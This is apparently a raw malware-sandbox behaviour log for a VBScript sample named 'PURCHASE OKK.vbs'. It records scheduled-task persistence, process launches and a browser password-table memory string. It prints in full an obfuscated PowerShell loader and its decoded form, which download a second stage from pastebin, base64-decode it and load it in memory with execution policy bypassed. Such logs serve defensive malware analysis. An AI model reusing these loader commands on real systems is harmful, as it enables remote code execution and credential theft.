                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j33tzyyw.j1n.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PURCHASE OKK.vbs"
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: iexpress.exe, 0000000C.00000002.2227220889.0000000003195000.00000004.00000020.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.00000000031B6000.00000004.00000020.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.00000000031E4000.00000004.00000020.00020000.00000000.sdmp, iexpress.exe, 0000000C.00000002.2227220889.00000000031C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PURCHASE OKK.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\user\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?Ho?RgBL?GE?QQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?bgBh?EE?ZwBk?GM?V?BH?Cc?I??7?CQ?SQBl?H??RwBR?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?Ds?J?B3?GU?YgBD?Gw?aQBl?G4?d??g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?FI?VgBV?Fg?dg?g?D0?I??k?Hc?ZQBi?EM?b?Bp?GU?bgB0?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?Ho?RgBL?GE?QQ?g?Ck?I??7?CQ?UgBW?FU?W?B2?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BJ?GU?c?BH?FE?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?Cc?VQBU?EY?O??n?C??LQBm?G8?cgBj?GU?I??7?CQ?UwBU?GY?RwBs?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??y?C4?d?B4?HQ?Jw?p?C??Ow?k?F??a?By?Gw?Tg?g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?F??a?By?Gw?Tg?u?EU?bgBj?G8?Z?Bp?G4?Zw?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?V?Bl?Hg?d??u?EU?bgBj?G8?Z?Bp?G4?ZwBd?Do?OgBV?FQ?Rg?4?C??Ow?k?EQ?S?B6?FU?QQ?g?C??PQ?g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?Ek?ZQBw?Ec?UQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??PQ?g?CQ?U?Bo?HI?b?BO?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?EQ?S?B6?FU?QQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BT?FQ?ZgBH?Gw?I??t?GY?bwBy?GM?ZQ?g?Ds?J?BN?E8?R?BS?Gc?I??9?C??I??n?CQ?cgB5?GE?ZQBH?C??PQ?g?Cg?RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??Jw?n?Cc?I??r?C??J?BT?FQ?ZgBH?Gw?I??r?C??Jw?n?Cc?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?FU?V?BG?Dg?KQ?7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?EI?eQB0?GU?WwBd?F0?I??k?EY?eQBm?GQ?eg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?HI?eQBh?GU?Rw?u?HI?ZQBw?Gw?YQBj?GU?K??n?Cc?J??k?CQ?J??n?Cc?L??n?Cc?QQ?n?Cc?KQ?g?Ck?I??7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Cc?I??r?C??Jw?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?I??k?EY?eQBm?GQ?eg?g?Ck?Lg?n?C??Ow?k?E0?TwBE?FI?Zw?g?Cs?PQ?g?Cc?RwBl?HQ?V?B5?H??ZQ?o?C??Jw?n?E0?aQBz?GU?cgBp?GM?bwBy?GQ?aQBv?HM?bwBB?G0?ZQBu?C4?QwBs?GE?cwBz?DE?Jw?n?C??KQ?u?Ec?ZQB0?E0?Jw?g?Ds?J?BN?E8?R?BS?Gc?I??r?D0?I??n?GU?d?Bo?G8?Z??o?C??Jw?n?E0?cwBx?EI?SQBi?Fk?Jw?n?C??KQ?u?Ek?bgB2?G8?awBl?Cg?I??k?G4?dQBs?Gw?I??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?I??n?Cc?M??v?FQ?UgB4?E8?R?Ba?Dk?N??v?HI?LwBl?GU?LgBl?HQ?cwBh?H??Lw?v?Do?cwBw?HQ?d?Bo?Cc?Jw?g?Cw?I??n?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?Cc?I??s?C??Jw?n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeProcess created: C:\Windows\SysWOW64\iexpress.exe "C:\Windows\SysWOW64\iexpress.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Windows\SysWOW64\iexpress.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn task name /fJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\user\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutosJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?Ho?RgBL?GE?QQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?bgBh?EE?ZwBk?GM?V?BH?Cc?I??7?CQ?SQBl?H??RwBR?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?Ds?J?B3?GU?YgBD?Gw?aQBl?G4?d??g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?FI?VgBV?Fg?dg?g?D0?I??k?Hc?ZQBi?EM?b?Bp?GU?bgB0?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?Ho?RgBL?GE?QQ?g?Ck?I??7?CQ?UgBW?FU?W?B2?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BJ?GU?c?BH?FE?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?Cc?VQBU?EY?O??n?C??LQBm?G8?cgBj?GU?I??7?CQ?UwBU?GY?RwBs?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??y?C4?d?B4?HQ?Jw?p?C??Ow?k?F??a?By?Gw?Tg?g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?F??a?By?Gw?Tg?u?EU?bgBj?G8?Z?Bp?G4?Zw?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?V?Bl?Hg?d??u?EU?bgBj?G8?Z?Bp?G4?ZwBd?Do?OgBV?FQ?Rg?4?C??Ow?k?EQ?S?B6?FU?QQ?g?C??PQ?g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?Ek?ZQBw?Ec?UQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??PQ?g?CQ?U?Bo?HI?b?BO?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?EQ?S?B6?FU?QQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BT?FQ?ZgBH?Gw?I??t?GY?bwBy?GM?ZQ?g?Ds?J?BN?E8?R?BS?Gc?I??9?C??I??n?CQ?cgB5?GE?ZQBH?C??PQ?g?Cg?RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??Jw?n?Cc?I??r?C??J?BT?FQ?ZgBH?Gw?I??r?C??Jw?n?Cc?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?FU?V?BG?Dg?KQ?7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?EI?eQB0?GU?WwBd?F0?I??k?EY?eQBm?GQ?eg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?HI?eQBh?GU?Rw?u?HI?ZQBw?Gw?YQBj?GU?K??n?Cc?J??k?CQ?J??n?Cc?L??n?Cc?QQ?n?Cc?KQ?g?Ck?I??7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Cc?I??r?C??Jw?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?I??k?EY?eQBm?GQ?eg?g?Ck?Lg?n?C??Ow?k?E0?TwBE?FI?Zw?g?Cs?PQ?g?Cc?RwBl?HQ?V?B5?H??ZQ?o?C??Jw?n?E0?aQBz?GU?cgBp?GM?bwBy?GQ?aQBv?HM?bwBB?G0?ZQBu?C4?QwBs?GE?cwBz?DE?Jw?n?C??KQ?u?Ec?ZQB0?E0?Jw?g?Ds?J?BN?E8?R?BS?Gc?I??r?D0?I??n?GU?d?Bo?G8?Z??o?C??Jw?n?E0?cwBx?EI?SQBi?Fk?Jw?n?C??KQ?u?Ek?bgB2?G8?awBl?Cg?I??k?G4?dQBs?Gw?I??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?I??n?Cc?M??v?FQ?UgB4?E8?R?Ba?Dk?N??v?HI?LwBl?GU?LgBl?HQ?cwBh?H??Lw?v?Do?cwBw?HQ?d?Bo?Cc?Jw?g?Cw?I??n?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?Cc?I??s?C??Jw?n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exeProcess created: C:\Windows\SysWOW64\iexpress.exe "C:\Windows\SysWOW64\iexpress.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
